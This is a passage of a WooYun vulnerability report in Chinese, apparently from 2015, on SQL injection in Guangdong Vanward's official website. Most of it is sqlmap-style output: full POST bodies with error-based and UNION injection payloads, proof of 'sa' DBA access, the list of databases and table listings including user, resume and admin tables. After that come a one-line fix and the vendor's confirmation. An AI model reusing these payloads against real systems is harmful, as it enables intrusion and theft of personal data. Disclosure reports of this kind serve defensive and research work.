VzTGlzdC5hc3B4P0NhdGVnb3J5SWQ9NjgWAmYPFQES5rCf5b6q546v5YiG5L2T5py6ZAIDD2QWAgIBDxYCHwEFLn4vcHJvZHVjdC
9Qcm9kdWN0U2VyaWVzTGlzdC5hc3B4P0NhdGVnb3J5SWQ9NDQWAmYPFQEM5ZWG55So54Ot5rO1ZAIGD2QWBAIBDxYCHwE
FLn4vcHJvZHVjdC9Qcm9kdWN0U2VyaWVzTGlzdC5hc3B4P0NhdGVnb3J5SWQ9MzAWAmYPFQEY6IO95rqQ6ZuG5oiQ54Ot5rC05
7O757ufZAIDDxYCHwACBRYKZg9kFgICAQ8WAh8BBS5 
L3Byb2R1Y3QvUHJvZHVjdFNlcmllc0xpc3QuYXNweD9DYXRlZ29yeUlkPTUwFgJmDxUBDOmYs WFieeHg 
eDrWQCAQ9kFgICAQ8WAh8BBS5 L3Byb2R1Y3QvUHJvZHVjdFNlcmllc0xpc3QuYXNweD9DYXRlZ29yeUlkPTUxFgJmDxUBDOmYs 
WFieeUteeDrWQCAg9kFgICAQ8WAh8BBS5 
L3Byb2R1Y3QvUHJvZHVjdFNlcmllc0xpc3QuYXNweD9DYXRlZ29yeUlkPTgxFgJmDxUBFeWIq WiheWei mYs 
WFieeUteeDrWQCAw9kFgICAQ8WAh8BBS5 
L3Byb2R1Y3QvUHJvZHVjdFNlcmllc0xpc3QuYXNweD9DYXRlZ29yeUlkPTUyFgJmDxUBFeWIq WiheWei mYs WFieeHg 
eDrWQCBA9kFgICAQ8WAh8BBS5 L3Byb2R1Y3QvUHJvZHVjdFNlcmllc0xpc3QuYXNweD9DYXRlZ29yeUlkPTgwFgJmDxUBFeWIq 
WiheWei mYs WFieeDreaztWQCBw9kFgQCAQ8WAh8BBS5 
L3Byb2R1Y3QvUHJvZHVjdFNlcmllc0xpc3QuYXNweD9DYXRlZ29yeUlkPTE1FgJmDxUBDOWQuOayueeDn 
acumQCAw8WAh8AAgMWBmYPZBYCAgEPFgIfAQUufi9wcm9kdWN0L1Byb2R1Y3RTZXJpZXNMaXN0LmFzcHg/Q2F0ZWdvcnlJZ
D0xNhYCZg8VAQbmrKflvI9kAgEPZBYCAgEPFgIfAQUufi9wcm9kdWN0L1Byb2R1Y3RTZXJpZXNMaXN0LmFzcHg/Q2F0ZWdvcnlJZ
D0xNxYCZg8VAQbkuK3lvI9kAgIPZBYCAgEPFgIfAQUufi9wcm9kdWN0L1Byb2R1Y3RTZXJpZXNMaXN0LmFzcHg/Q2F0ZWdvcnlJZ
D0xOBYCZg8VAQnov5HlkLjlvI9kAggPZBYEAgEPFgIfAQUtfi9wcm9kdWN0L1Byb2R1Y3RTZXJpZXNMaXN0LmFzcHg/Q2F0ZWdvcn
lJZD02FgJmDxUBCeeHg 
awlOeBtmQCAw8WAh8AAgIWBGYPZBYCAgEPFgIfAQUtfi9wcm9kdWN0L1Byb2R1Y3RTZXJpZXNMaXN0LmFzcHg/Q2F0ZWdvcnlJ
ZD03FgJmDxUBCeW1jOWFpeW8j2QCAQ9kFgICAQ8WAh8BBS1 
L3Byb2R1Y3QvUHJvZHVjdFNlcmllc0xpc3QuYXNweD9DYXRlZ29yeUlkPTgWAmYPFQEG5Y 
w5byPZAIJD2QWBAIBDxYCHwEFLn4vcHJvZHVjdC9Qcm9kdWN0U2VyaWVzTGlzdC5hc3B4P0NhdGVnb3J5SWQ9MTkWAmYPFQE
M5raI5q S56KX5p cZAIDDxYCHwACAxYGZg9kFgICAQ8WAh8BBS5 
L3Byb2R1Y3QvUHJvZHVjdFNlcmllc0xpc3QuYXNweD9DYXRlZ29yeUlkPTIwFgJmDxUBCeW1jOWFpeW8j2QCAQ9kFgICAQ8WAh8B
BS5 L3Byb2R1Y3QvUHJvZHVjdFNlcmllc0xpc3QuYXNweD9DYXRlZ29yeUlkPTIxFgJmDxUBBuWNp 
W8j2QCAg9kFgICAQ8WAh8BBS5 L3Byb2R1Y3QvUHJvZHVjdFNlcmllc0xpc3QuYXNweD9DYXRlZ29yeUlkPTIyFgJmDxUBBueri 
W8j2QCCg9kFgQCAQ8WAh8BBS5 
L3Byb2R1Y3QvUHJvZHVjdFNlcmllc0xpc3QuYXNweD9DYXRlZ29yeUlkPTU1FgJmDxUBDOWHgOawtOiuvuWkh2QCAw8WAh8AZm
QCCw9kFgQCAQ8WAh8BBS5 L3Byb2R1Y3QvUHJvZHVjdFNlcmllc0xpc3QuYXNweD9DYXRlZ29yeUlkPTU2FgJmDxUBD WFtuWug 
Wwj WutueUtWQCAw8WAh8AZmQCDA9kFgQCAQ8WAh8BBS5 
L3Byb2R1Y3QvUHJvZHVjdFNlcmllc0xpc3QuYXNweD9DYXRlZ29yeUlkPTgyFgJmDxUBCeeUteeDpOeusWQCAw8WAh8AZmQCVA8
WAh8AAggWEGYPZBYCZg8VAwExATMG5qW855uYZAIBD2QWAmYPFQMBMQExBumFkuW6l2QCAg9kFgJmDxUDATECNDkb5b
el5Lia5LyB5Lia5Y 
K5bel5Lia5Zut5Yy6ZAIDD2QWAmYPFQMBMQMxMDIM6YeH5pqW5bel56iLZAIED2QWAmYPFQMBMQEyBuWtpuagoWQCBQ9k
FgJmDxUDATEBNQNCT1RkAgYPZBYCZg8VAwExATQG5Yy76ZmiZAIHD2QWAmYPFQMBMQI5MxLlhbblroPlhazlhbHlu7rnrZFkAo
gBD2QWAgIDD2QWAgIDDzwrAAkBAA8WBB4IRGF0YUtleXMWAB8AZmRkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfX
xYCBRhjdGwwMCRjdGwwMCRpbWdCdG5TZWFyY2gFQmN0bDAwJGN0bDAwJENvbnRlbnRQbGFjZUhvbGRlcjEkQ29udGVudFBs
YWNlSG9sZGVyMV8xJFJhZGlvQnV0dG9uMSr4AhLdKSfuuynf2bvUCGQ7ryPM&__VIEWSTATEGENERATOR=A8C87D47&__EVENTT
ARGET=&__EVENTARGUMENT=&__EVENTVALIDATION=/wEWJQLd75TGBgLp4ai0CgLNpdNCAoDGjNoPAqD0o48BAvugpJwMAv
/Zn5QCArHDg8MOAsqLk gPAuCcwScCxITh AMCr7/U AMCt/Cwwg8CmcCeuQEC4 eeuQEC4 
fq3Q4CmP71ugECk83H2AoCtMzIvA8CvaPi0gMCu6OS0QMCuaOi0QMCvqOi0QMC4sjtoAEC69PCtAYCvcjo3wIC9putiQkCz/Szng
MCiNf8hwQCiaOq6wIC58vilwgC7I3BwwICrLuYmw0CtPrDhAECpt7vpA8C 
Yyv8gICgYjTrgkmSfoABjx3ctbSuPmqwSlgunvSEg==&ctl00$ctl00$search=&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHold
er1_1$departments=%E8%90%A5%E9%94%80&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder1_1$education=
%E5%8D%9A%E5%A3%AB
%E7%A0%94%E7%A9%B6%E7%94%9F&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder1_1$releaseDate=7&ctl00$ctl00$
ContentPlaceHolder1$ContentPlaceHolder1_1$experience=%E5%BA%94%E5%B1%8A%E6%AF%95%E4%B8%9A
%E7%94%9F&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder1_1$requirements=1%' AND 4232=CONVERT(INT,(SELECT 
CHAR(113) CHAR(121) CHAR(107) CHAR(106) CHAR(113) (SELECT (CASE WHEN (4232=4232) THEN CHAR(49) ELSE CHAR(48) 
END)) CHAR(113) CHAR(122) CHAR(111) CHAR(100) CHAR(113))) AND 
'%'='&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder1_1$professional=3&ctl00$ctl00$ContentPlaceHolder1$ContentPla
ceHolder1_1$jobname=4&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder1_1$RadioButton1=RadioButton1&ctl00$ctl00$
ContentPlaceHolder1$ContentPlaceHolder1_1$jobSearch=%E6%90%9C   %E7%B4%A2
    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: 
__VIEWSTATE=/wEPDwUKMTc0NTU5OTYzMw9kFgJmD2QWAmYPZBYCAgMPZBYGAjwPFgIeC18hSXRlbUNvdW50Ag0WGmYPZ
BYEAgEPFgIeBGhyZWYFLX4vcHJvZHVjdC9Qcm9kdWN0U2VyaWVzTGlzdC5hc3B4P0NhdGVnb3J5SWQ9MRYCZg8VAQ/nh4PmsJ
Tng63msLTlmahkAgMPFgIfAAIEFghmD2QWAgIBDxYCHwEFLn4vcHJvZHVjdC9Qcm9kdWN0U2VyaWVzTGlzdC5hc3B4P0NhdGVn
b3J5SWQ9MzIWAmYPFQEWU ezu WIl  8iOi2heixquWNju 8iWQCAQ9kFgICAQ8WAh8BBS1 
L3Byb2R1Y3QvUHJvZHVjdFNlcmllc0xpc3QuYXNweD9DYXRlZ29yeUlkPTUWAmYPFQETReezu WIl  8iOixquWNju 
8iWQCAg9kFgICAQ8WAh8BBS1 L3Byb2R1Y3QvUHJvZHVjdFNlcmllc0xpc3QuYXNweD9DYXRlZ29yeUlkPTQWAmYPFQETQ ezu 
WIl  8iOS4ree6p  8iWQCAw9kFgICAQ8WAh8BBS1 
L3Byb2R1Y3QvUHJvZHVjdFNlcmllc0xpc3QuYXNweD9DYXRlZ29yeUlkPTMWAmYPFQEM5bmz6KGh57O75YiXZAIBD2QWBAIBDxY
CHwEFLn4vcHJvZHVjdC9Qcm9kdWN0U2VyaWVzTGlzdC5hc3B4P0NhdGVnb3J5SWQ9MjMWAmYPFQEM55S154Ot5rC05ZmoZAI
DDxYCHwACBRYKZg9kFgICAQ8WAh8BBS5 
L3Byb2R1Y3QvUHJvZHVjdFNlcmllc0xpc3QuYXNweD9DYXRlZ29yeUlkPTcyFgJmDxUBF mAn 
eDrS/nnqzng60g5pm66IO95Z6LZAIBD2QWAgIBDxYCHwEFLn4vcHJvZHVjdC9Qcm9kdWN0U2VyaWVzTGlzdC5hc3B4P0NhdGVnb
3J5SWQ9MjQWAmYPFQES5Y M6Ziy55S155u 
5pm66IO9ZAICD2QWAgIBDxYCHwEFLn4vcHJvZHVjdC9Qcm9kdWN0U2VyaWVzTGlzdC5hc3B4P0NhdGVnb3J5SWQ9MjUWAmYP
FQES5Y M6Ziy55S155u 
5py65qKwZAIDD2QWAgIBDxYCHwEFLn4vcHJvZHVjdC9Qcm9kdWN0U2VyaWVzTGlzdC5hc3B4P0NhdGVnb3J5SWQ9MjYWAmYP
FQEP6Ziy55S16Ze457O75YiXZAIED2QWAgIBDxYCHwEFLn4vcHJvZHVjdC9Qcm9kdWN0U2VyaWVzTGlzdC5hc3B4P0NhdGVnb3J5
SWQ9MjcWAmYPFQES5b 
r54Ot5byP54Ot5rC05ZmoZAICD2QWBAIBDxYCHwEFLX4vcHJvZHVjdC9Qcm9kdWN0U2VyaWVzTGlzdC5hc3B4P0NhdGVnb3J5S
WQ9ORYCZg8VAQnlo4HmjILngolkAgMPFgIfAAILFhZmD2QWAgIBDxYCHwEFLn4vcHJvZHVjdC9Qcm9kdWN0U2VyaWVzTGlzdC5
hc3B4P0NhdGVnb3J5SWQ9MTMWAmYPFQEHWeezu WIl2QCAQ9kFgICAQ8WAh8BBS5 
L3Byb2R1Y3QvUHJvZHVjdFNlcmllc0xpc3QuYXNweD9DYXRlZ29yeUlkPTE0FgJmDxUBB0Xns7vliJdkAgIPZBYCAgEPFgIfAQUufi9wc
m9kdWN0L1Byb2R1Y3RTZXJpZXNMaXN0LmFzcHg/Q2F0ZWdvcnlJZD0xMBYCZg8VAQdT57O75YiXZAIDD2QWAgIBDxYCHwEFLn
4vcHJvZHVjdC9Qcm9kdWN0U2VyaWVzTGlzdC5hc3B4P0NhdGVnb3J5SWQ9MzUWAmYPFQEHSOezu 
WIl2QCBA9kFgICAQ8WAh8BBS5 
L3Byb2R1Y3QvUHJvZHVjdFNlcmllc0xpc3QuYXNweD9DYXRlZ29yeUlkPTExFgJmDxUBD0zns7vliJco5Ya35YedKWQCBQ9kFgICAQ8
WAh8BBS5 
L3Byb2R1Y3QvUHJvZHVjdFNlcmllc0xpc3QuYXNweD9DYXRlZ29yeUlkPTM3FgJmDxUBD1Lns7vliJco5Ya35YedKWQCBg9kFgICAQ8
WAh8BBS5 L3Byb2R1Y3QvUHJvZHVjdFNlcmllc0xpc3QuYXNweD9DYXRlZ29yeUlkPTM4FgJmDxUBEFdI57O75YiXKOWGt 
WHnSlkAgcPZBYCAgEPFgIfAQUufi9wcm9kdWN0L1Byb2R1Y3RTZXJpZXNMaXN0LmFzcHg/Q2F0ZWdvcnlJZD0zNhYCZg8VAQ9a5
7O75YiXKOWGt 
WHnSlkAggPZBYCAgEPFgIfAQUufi9wcm9kdWN0L1Byb2R1Y3RTZXJpZXNMaXN0LmFzcHg/Q2F0ZWdvcnlJZD02NhYCZg8VARNU
57O75YiX77yI5Ya35Yed77yJZAIJD2QWAgIBDxYCHwEFLn4vcHJvZHVjdC9Qcm9kdWN0U2VyaWVzTGlzdC5hc3B4P0NhdGVnb3J5S
WQ9NjkWAmYPFQEHQeezu WIl2QCCg9kFgICAQ8WAh8BBS5 
L3Byb2R1Y3QvUHJvZHVjdFNlcmllc0xpc3QuYXNweD9DYXRlZ29yeUlkPTcwFgJmDxUBB0vns7vliJdkAgMPZBYEAgEPFgIfAQUufi9w
cm9kdWN0L1Byb2R1Y3RTZXJpZXNMaXN0LmFzcHg/Q2F0ZWdvcnlJZD0yOBYCZg8VARLlpKrpmLPog73ng63msLTlmahkAgMPFgI
fAAICFgRmD2QWAgIBDxYCHwEFLn4vcHJvZHVjdC9Qcm9kdWN0U2VyaWVzTGlzdC5hc3B4P0NhdGVnb3J5SWQ9NDgWAmYPFQ
Ee6Ziz5Y 
w5aOB5oyC5byP5bmz5p2/5aSq6Ziz6IO9ZAIBD2QWAgIBDxYCHwEFLn4vcHJvZHVjdC9Qcm9kdWN0U2VyaWVzTGlzdC5hc3B4P0
NhdGVnb3J5SWQ9NDkWAmYPFQEh5Yir5aKF54Ot5rC05Lit5b 
D5bmz5p2/5aSq6Ziz6IO9ZAIED2QWBAIBDxYCHwEFLn4vcHJvZHVjdC9Qcm9kdWN0U2VyaWVzTGlzdC5hc3B4P0NhdGVnb3J5SW
Q9NzMWAmYPFQEKR0FBVOezu 
WIl2QCAw8WAh8AAgYWDGYPZBYCAgEPFgIfAQUufi9wcm9kdWN0L1Byb2R1Y3RTZXJpZXNMaXN0LmFzcHg/Q2F0ZWdvcnlJZD0
3NBYCZg8VAQdZ57O75YiXZAIBD2QWAgIBDxYCHwEFLn4vcHJvZHVjdC9Qcm9kdWN0U2VyaWVzTGlzdC5hc3B4P0NhdGVnb3J5S
WQ9NzUWAmYPFQEHReezu WIl2QCAg9kFgICAQ8WAh8BBS5 
L3Byb2R1Y3QvUHJvZHVjdFNlcmllc0xpc3QuYXNweD9DYXRlZ29yeUlkPTc2FgJmDxUBB0jns7vliJdkAgMPZBYCAgEPFgIfAQUufi9wc
m9kdWN0L1Byb2R1Y3RTZXJpZXNMaXN0LmFzcHg/Q2F0ZWdvcnlJZD03NxYCZg8VAQdM57O75YiXZAIED2QWAgIBDxYCHwEFLn
4vcHJvZHVjdC9Qcm9kdWN0U2VyaWVzTGlzdC5hc3B4P0NhdGVnb3J5SWQ9NzgWAmYPFQEHVOezu 
WIl2QCBQ9kFgICAQ8WAh8BBS5 
L3Byb2R1Y3QvUHJvZHVjdFNlcmllc0xpc3QuYXNweD9DYXRlZ29yeUlkPTc5FgJmDxUBB1Pns7vliJdkAgUPZBYEAgEPFgIfAQUufi9wc
m9kdWN0L1Byb2R1Y3RTZXJpZXNMaXN0LmFzcHg/Q2F0ZWdvcnlJZD0yORYCZg8VARjnqbrmsJTmupDng63ms7Xng63msLTlmah
kAgMPFgIfAAIEFghmD2QWAgIBDxYCHwEFLn4vcHJvZHVjdC9Qcm9kdWN0U2VyaWVzTGlzdC5hc3B4P0NhdGVnb3J5SWQ9MzM
WAmYPFQEP55S16L6F5LiA5L2T5py6ZAIBD2QWAgIBDxYCHwEFLn4vcHJvZHVjdC9Qcm9kdWN0U2VyaWVzTGlzdC5hc3B4P0Nhd
GVnb3J5SWQ9MzkWAmYPFQES5rC05b6q546v5YiG5L2T5py6ZAICD2QWAgIBDxYCHwEFLn4vcHJvZHVjdC9Qcm9kdWN0U2VyaW
VzTGlzdC5hc3B4P0NhdGVnb3J5SWQ9NjgWAmYPFQES5rCf5b6q546v5YiG5L2T5py6ZAIDD2QWAgIBDxYCHwEFLn4vcHJvZHVjdC
9Qcm9kdWN0U2VyaWVzTGlzdC5hc3B4P0NhdGVnb3J5SWQ9NDQWAmYPFQEM5ZWG55So54Ot5rO1ZAIGD2QWBAIBDxYCHwE
FLn4vcHJvZHVjdC9Qcm9kdWN0U2VyaWVzTGlzdC5hc3B4P0NhdGVnb3J5SWQ9MzAWAmYPFQEY6IO95rqQ6ZuG5oiQ54Ot5rC05
7O757ufZAIDDxYCHwACBRYKZg9kFgICAQ8WAh8BBS5 
L3Byb2R1Y3QvUHJvZHVjdFNlcmllc0xpc3QuYXNweD9DYXRlZ29yeUlkPTUwFgJmDxUBDOmYs WFieeHg 
eDrWQCAQ9kFgICAQ8WAh8BBS5 L3Byb2R1Y3QvUHJvZHVjdFNlcmllc0xpc3QuYXNweD9DYXRlZ29yeUlkPTUxFgJmDxUBDOmYs 
WFieeUteeDrWQCAg9kFgICAQ8WAh8BBS5 
L3Byb2R1Y3QvUHJvZHVjdFNlcmllc0xpc3QuYXNweD9DYXRlZ29yeUlkPTgxFgJmDxUBFeWIq WiheWei mYs 
WFieeUteeDrWQCAw9kFgICAQ8WAh8BBS5 
L3Byb2R1Y3QvUHJvZHVjdFNlcmllc0xpc3QuYXNweD9DYXRlZ29yeUlkPTUyFgJmDxUBFeWIq WiheWei mYs WFieeHg 
eDrWQCBA9kFgICAQ8WAh8BBS5 L3Byb2R1Y3QvUHJvZHVjdFNlcmllc0xpc3QuYXNweD9DYXRlZ29yeUlkPTgwFgJmDxUBFeWIq 
WiheWei mYs WFieeDreaztWQCBw9kFgQCAQ8WAh8BBS5 
L3Byb2R1Y3QvUHJvZHVjdFNlcmllc0xpc3QuYXNweD9DYXRlZ29yeUlkPTE1FgJmDxUBDOWQuOayueeDn 
acumQCAw8WAh8AAgMWBmYPZBYCAgEPFgIfAQUufi9wcm9kdWN0L1Byb2R1Y3RTZXJpZXNMaXN0LmFzcHg/Q2F0ZWdvcnlJZ
D0xNhYCZg8VAQbmrKflvI9kAgEPZBYCAgEPFgIfAQUufi9wcm9kdWN0L1Byb2R1Y3RTZXJpZXNMaXN0LmFzcHg/Q2F0ZWdvcnlJZ
D0xNxYCZg8VAQbkuK3lvI9kAgIPZBYCAgEPFgIfAQUufi9wcm9kdWN0L1Byb2R1Y3RTZXJpZXNMaXN0LmFzcHg/Q2F0ZWdvcnlJZ
D0xOBYCZg8VAQnov5HlkLjlvI9kAggPZBYEAgEPFgIfAQUtfi9wcm9kdWN0L1Byb2R1Y3RTZXJpZXNMaXN0LmFzcHg/Q2F0ZWdvcn
lJZD02FgJmDxUBCeeHg 
awlOeBtmQCAw8WAh8AAgIWBGYPZBYCAgEPFgIfAQUtfi9wcm9kdWN0L1Byb2R1Y3RTZXJpZXNMaXN0LmFzcHg/Q2F0ZWdvcnlJ
ZD03FgJmDxUBCeW1jOWFpeW8j2QCAQ9kFgICAQ8WAh8BBS1 
L3Byb2R1Y3QvUHJvZHVjdFNlcmllc0xpc3QuYXNweD9DYXRlZ29yeUlkPTgWAmYPFQEG5Y 
w5byPZAIJD2QWBAIBDxYCHwEFLn4vcHJvZHVjdC9Qcm9kdWN0U2VyaWVzTGlzdC5hc3B4P0NhdGVnb3J5SWQ9MTkWAmYPFQE
M5raI5q S56KX5p cZAIDDxYCHwACAxYGZg9kFgICAQ8WAh8BBS5 
L3Byb2R1Y3QvUHJvZHVjdFNlcmllc0xpc3QuYXNweD9DYXRlZ29yeUlkPTIwFgJmDxUBCeW1jOWFpeW8j2QCAQ9kFgICAQ8WAh8B
BS5 L3Byb2R1Y3QvUHJvZHVjdFNlcmllc0xpc3QuYXNweD9DYXRlZ29yeUlkPTIxFgJmDxUBBuWNp 
W8j2QCAg9kFgICAQ8WAh8BBS5 L3Byb2R1Y3QvUHJvZHVjdFNlcmllc0xpc3QuYXNweD9DYXRlZ29yeUlkPTIyFgJmDxUBBueri 
W8j2QCCg9kFgQCAQ8WAh8BBS5 
L3Byb2R1Y3QvUHJvZHVjdFNlcmllc0xpc3QuYXNweD9DYXRlZ29yeUlkPTU1FgJmDxUBDOWHgOawtOiuvuWkh2QCAw8WAh8AZm
QCCw9kFgQCAQ8WAh8BBS5 L3Byb2R1Y3QvUHJvZHVjdFNlcmllc0xpc3QuYXNweD9DYXRlZ29yeUlkPTU2FgJmDxUBD WFtuWug 
Wwj WutueUtWQCAw8WAh8AZmQCDA9kFgQCAQ8WAh8BBS5 
L3Byb2R1Y3QvUHJvZHVjdFNlcmllc0xpc3QuYXNweD9DYXRlZ29yeUlkPTgyFgJmDxUBCeeUteeDpOeusWQCAw8WAh8AZmQCVA8
WAh8AAggWEGYPZBYCZg8VAwExATMG5qW855uYZAIBD2QWAmYPFQMBMQExBumFkuW6l2QCAg9kFgJmDxUDATECNDkb5b
el5Lia5LyB5Lia5Y 
K5bel5Lia5Zut5Yy6ZAIDD2QWAmYPFQMBMQMxMDIM6YeH5pqW5bel56iLZAIED2QWAmYPFQMBMQEyBuWtpuagoWQCBQ9k
FgJmDxUDATEBNQNCT1RkAgYPZBYCZg8VAwExATQG5Yy76ZmiZAIHD2QWAmYPFQMBMQI5MxLlhbblroPlhazlhbHlu7rnrZFkAo
gBD2QWAgIDD2QWAgIDDzwrAAkBAA8WBB4IRGF0YUtleXMWAB8AZmRkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfX
xYCBRhjdGwwMCRjdGwwMCRpbWdCdG5TZWFyY2gFQmN0bDAwJGN0bDAwJENvbnRlbnRQbGFjZUhvbGRlcjEkQ29udGVudFBs
YWNlSG9sZGVyMV8xJFJhZGlvQnV0dG9uMSr4AhLdKSfuuynf2bvUCGQ7ryPM&__VIEWSTATEGENERATOR=A8C87D47&__EVENTT
ARGET=&__EVENTARGUMENT=&__EVENTVALIDATION=/wEWJQLd75TGBgLp4ai0CgLNpdNCAoDGjNoPAqD0o48BAvugpJwMAv
/Zn5QCArHDg8MOAsqLk gPAuCcwScCxITh AMCr7/U AMCt/Cwwg8CmcCeuQEC4 eeuQEC4 
fq3Q4CmP71ugECk83H2AoCtMzIvA8CvaPi0gMCu6OS0QMCuaOi0QMCvqOi0QMC4sjtoAEC69PCtAYCvcjo3wIC9putiQkCz/Szng
MCiNf8hwQCiaOq6wIC58vilwgC7I3BwwICrLuYmw0CtPrDhAECpt7vpA8C 
Yyv8gICgYjTrgkmSfoABjx3ctbSuPmqwSlgunvSEg==&ctl00$ctl00$search=&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHold
er1_1$departments=%E8%90%A5%E9%94%80&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder1_1$education=
%E5%8D%9A%E5%A3%AB
%E7%A0%94%E7%A9%B6%E7%94%9F&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder1_1$releaseDate=7&ctl00$ctl00$
ContentPlaceHolder1$ContentPlaceHolder1_1$experience=%E5%BA%94%E5%B1%8A%E6%AF%95%E4%B8%9A
%E7%94%9F&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder1_1$requirements=1%' UNION ALL SELECT CHAR(113) 
CHAR(121) CHAR(107) CHAR(106) CHAR(113) CHAR(83) CHAR(83) CHAR(69) CHAR(120) CHAR(81) CHAR(88) CHAR(74) CHAR(81) 
CHAR(120) CHAR(86) CHAR(113) CHAR(122) CHAR(111) CHAR(100) CHAR(113),NULL,NULL,NULL,NULL,NULL-- 
&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder1_1$professional=3&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHo
lder1_1$jobname=4&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder1_1$RadioButton1=RadioButton1&ctl00$ctl00$Cont
entPlaceHolder1$ContentPlaceHolder1_1$jobSearch=%E6%90%9C   %E7%B4%A2
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
current user:    'sa'
current database:    'vanward_web'
current user is DBA:    True
available databases [7]:
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] vanward_web
Database: vanward_web
+------------------------------+---------+
| Table                        | Entries |
+------------------------------+---------+
| dbo.UserList                 | 8360    |
| dbo.ParameterValues          | 3697    |
| dbo.phone_Product_Parameters | 1605    |
| dbo.Resume                   | 1174    |
| dbo.vanwardNews              | 1099    |
| dbo.lucky_double_user        | 946     |
| dbo.phone_Product_Selling    | 856     |
| dbo.VanwardProdMessage2      | 702     |
| dbo.VanwardProdMessage2      | 702     |
| dbo.TechnologyRelation       | 424     |
| dbo.Area                     | 377     |
| dbo.phone_Product_Img        | 377     |
| dbo.phone_Product_Img        | 377     |
| dbo.Products                 | 377     |
| dbo.phone_Type_Selling       | 353     |
| dbo.phone_Type_Parameters    | 335     |
| dbo.phone_Selling_Coll       | 264     |
| dbo.UserJob                  | 261     |
| dbo.Parameters               | 229     |
| dbo.prototype                | 217     |
| dbo.anniversary              | 177     |
| dbo.EN_Products              | 176     |
| dbo.Technologies             | 172     |
| dbo.phone_YearImg            | 164     |
| dbo.phone_YearTable          | 161     |
| dbo.aboutVanwardE            | 156     |
| dbo.aboutVanwardE            | 156     |
| dbo.phone_Shopping           | 147     |
| dbo.RecommendUnitProds       | 144     |
| dbo.Series                   | 139     |
| dbo.NewCenterBook            | 124     |
| dbo.phone_Parameters_Coll    | 121     |
| dbo.Schuster_ProductsImg     | 75      |
| dbo.Schuster_ProductsImg     | 75      |
| dbo.ServiceNetwork           | 73      |
| dbo.NewCenterProposal        | 68      |
| dbo.Columns_Table            | 60      |
| dbo.Categories               | 58      |
| dbo.phone_Product_Type       | 51      |
| dbo.OrderForm                | 45      |
| dbo.jobs                     | 44      |
| dbo.Schuster_Download        | 44      |
| dbo.Questions                | 43      |
| dbo.Agents                   | 39      |
| dbo.ProdCondTypeRelation     | 37      |
| dbo.Authorities              | 36      |
| dbo.ProgramsProducts         | 34      |
| dbo.ProgramsProducts         | 34      |
| dbo.VanwardStore             | 33      |
| dbo.EN_Categories            | 31      |
| dbo.NewsysProvince           | 31      |
| dbo.humanRe                  | 30      |
| dbo.ProdCondTypes            | 30      |
| dbo.OrderProducts            | 27      |
| dbo.ProgramsProductType      | 25      |
| dbo.vanwardTypeE             | 23      |
| dbo.vanwardTypeE             | 23      |
| dbo.Schuster_MenuType        | 21      |
| dbo.flashImg                 | 20      |
| dbo.Gongcheng                | 20      |
| dbo.ProgramType              | 19      |
| dbo.engineer                 | 16      |
| dbo.NewsysProduct            | 15      |
| dbo.lucky_double_video       | 14      |
| dbo.Admins                   | 11      |
| dbo.Aerospace                | 11      |
| dbo.HybridType               | 11      |
| dbo.STravel                  | 11      |
| dbo.Modules                  | 10      |
| dbo.NewCenterPic             | 10      |
| dbo.NewsysProductype         | 10      |
| dbo.phone_News               | 10      |
| dbo.Rocket                   | 10      |
| dbo.phone_Maintenance        | 9       |
| dbo.Jurisdiction             | 8       |
| dbo.phone_Install            | 8       |
| dbo.HomeCommendProds         | 6       |
| dbo.HomeCommendProds         | 6       |
| dbo.lucky_double_date        | 6       |
| dbo.lucky_double_num         | 6       |
| dbo.minisite_newstable       | 6       |
| dbo.NewCenterBind            | 6       |
| dbo.NewsysProposal           | 6       |
| dbo.Demo                     | 5       |
| dbo.kitchen_pic              | 4       |
| dbo.Schuster_DownloadType    | 4       |
| dbo.ActingMembers            | 3       |
| dbo.EN_Links                 | 3       |
| dbo.EN_Questions             | 3       |
| dbo.kitchen_news             | 3       |
| dbo.minisite_concer          | 3       |
| dbo.newdefault               | 3       |
| dbo.newsVideo                | 2       |
| dbo.Schuster_Contacts        | 2       |
| dbo.Schuster_News            | 2       |
| dbo.Stocks                   | 2       |
| dbo.phone_Parts              | 1       |
| dbo.rabbit                   | 1       |
| dbo.S3_Tmp                   | 1       |
+------------------------------+---------+

夜深了，就不继续了！~~~

漏洞证明：

如上

修复方案：

过滤修复！~~~

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：10

确认时间：2015-11-11 15:01

厂商回复：

非常感谢您的报告。
报告中的问题已确认并复现.
影响的数据：高
攻击成本：低
造成影响：高
综合评级为：高，rank：10
正在联系相关网站管理单位处置。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0153482

漏洞标题：广东万和新电气官网多处SQL注射（DBA权限+泄露用户信息+燃气套餐+各种反馈信息）

相关厂商：广东省信息安全测评中心

漏洞作者：路人甲

提交时间：2015-11-11 10:34

修复时间：2015-12-26 15:02

公开时间：2015-12-26 15:02

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(广东省信息安全测评中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0153482

